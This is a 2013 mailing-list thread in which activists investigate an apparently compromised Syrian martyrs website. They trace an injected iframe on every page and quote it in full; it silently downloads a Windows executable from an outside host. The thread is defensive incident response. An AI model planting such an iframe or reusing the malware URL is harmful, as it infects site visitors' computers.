Just a heads up the sites been taken down, malware is here: https://resources.telecomix.ceops.eu/material/malwares/
Also looking at getting access to the server in question for forensics. -Andrew On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <s...@redteam.io> wrote: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 This is the malware: https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ - --SiNA SiNA Rabbani: holly shit: <iframe name="I1" width="10" height="10" src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"; border="0" frameborder="0"> :/ if you are running windows don't even go there!!! Andrew Lewis: I can get to this in 6 hours or so, maybe someone is willing to jump on this before then? -Andrew On Jan 30, 2013, at 11:06 AM, KheOps <khe...@ceops.eu> wrote: Dear Libtech, We just saw that the website : http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame which links to a .exe file which is detected as a virus by antivirus software: http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe The fact that the HTML code is present at the bottom of each page makes me think that the "index.php" page has been changed in a way that makes that iFrame appear on every page of the website, after the dynamic content. It also probably means that the attackers have some kind of access to the server. My guess would be going to a PHP shell, but I'm no expert in this. Any help, clue, investigation, would be very welcome :) Thank you, KheOps -- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech -- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech - -- “Be the change you want to see in the world.” Gandhi OTR: i...@jabber.ccc.de a5dae15f45a37e9768f6deae7b54807fc4942ec9 -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRCE5pAAoJEDxieAEiLOmoxJMP/iQNfzxEQcQ81Yp8JtGJmos0 sO+G2HSosH5OD2+PWSXjLuIT7rwijZSgh4XeFz2vIbSicvv1xJZoPzmiUVhKC4GB 9nzUNar86XgtXx2yXCpCjSgQcVwWB2ZRZL6OeZM5DXPUjC/AINXCPQc4rGU1Mcak B22oBaqiHrWjk5mPQZNcnoJVD2IyL9ZaQBt3WtjLVZo3s59j5vEW/MVqiIrqJiSR E7m5ehPnfyh4KUKwEe2+/PF9K3e4o8v0DquJhbjxsu0ibfDJg/6cqKaiPYZvOv77 dSQ9YcOOFjHzOYUa/yeTZ2ea92LJPe58IsiIJQxmDWsOFV/upLn1hhVdONN+fTHO tKzcuCDjqwN1DCWPiyZe7y1EJzl6giplzXNk+XeoXwDau530u5iI65YwQBVtPEsA kqwHQQxOFsL5kx/JEdO+rKQcX9jAZAkQ9vF6XfNeOGvzwsvLJHbIlFPwxXP/CPjM kUMdkAjRghEM8kMB9D3BI2MI/uWJN9EVe46ZPQpfmVNBf5Uen9ROyKSp1/h9t9Wy fbWBDVGJms4rU9rVRsyYhFl3eiHfVDy2/y1yFLEzfCXqEJw7OHAstNJ3O8d+iDKI WLhlIFej4CyDjzyLy1P9k4YTnv3ZR16hHftIXXT+zj8sKPYXbawiAGWtwbBGws8j 8ijLbNKdHoHtJlcOGMwg =+vsJ -----END PGP SIGNATURE----- -- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
-- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
